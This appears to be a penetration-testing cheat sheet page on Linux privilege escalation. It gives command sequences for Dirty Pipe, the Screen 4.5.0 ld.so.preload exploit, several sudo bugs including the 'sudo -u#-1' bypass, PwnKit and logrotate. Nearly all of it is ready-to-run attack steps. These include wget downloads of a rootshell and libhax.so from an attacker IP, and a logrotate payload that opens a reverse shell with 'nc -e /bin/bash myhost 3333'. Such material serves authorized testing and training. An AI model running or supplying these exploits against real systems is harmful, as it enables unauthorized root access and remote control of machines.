Linux

Index

Dirty Pipe

Exploit kernel from 5.8 to 5.17

sudo apt-get install gcc
chmod +x compile.sh
./compile.sh

./exploit-1
# change the root password in the /etc/passwd file and get an elevated shell.

Screen 4.5.0

Exploit

chmod +x 41154.sh
./41154.sh

If you cannot compile on the machine

wget http://<IP>/libhax.so
wget http://<IP>/rootshell

chmod +x /tmp/rootshell
cd /etc/
umask 000
screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen-4.5.0 -ls
/tmp/rootshell

Sudo - Baron Samedit

Exploit sudo 1.8.21 | 1.8.31 | 1.8.27 | 1.9.2 | other

Sudo - Chroot

Exploit sudo 1.9.14 up to 1.9.17

Sudo - Runas ALL

Exploit sudo < 1.8.28

Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.

ex. alice myhost = (ALL) /usr/bin/id

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.

ex. bob myhost = (ALL, !root) /usr/bin/vi

sudo -u#-1 vi
sudo -u#4294967295 vi

PwnKit - Polkit

Exploit1 / Exploit2 Polkit < 0.105-26

pkexec --version

gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc

Logrotate

Exploit Logrotate 3.8.6 | 3.11.0 | 3.15.0 | 3.18.0

You have to find log files on which logrotate is run and on which you have write permissions. Then run exploit on the writable log file.

gcc -o logrotten logrotten.c

Prepare payload

echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

If "create"-option is set in logrotate.cfg:

./logrotten -p ./payloadfile /tmp/log/pwnme.log

If "compress"-option is set in logrotate.cfg:

./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Last updated 5 days ago

hashtagIndex

hashtagDirty Pipe

hashtagScreen 4.5.0

hashtagSudo - Baron Samedit

hashtagSudo - Chroot

hashtagSudo - Runas ALL

hashtagPwnKit - Polkit

hashtagLogrotate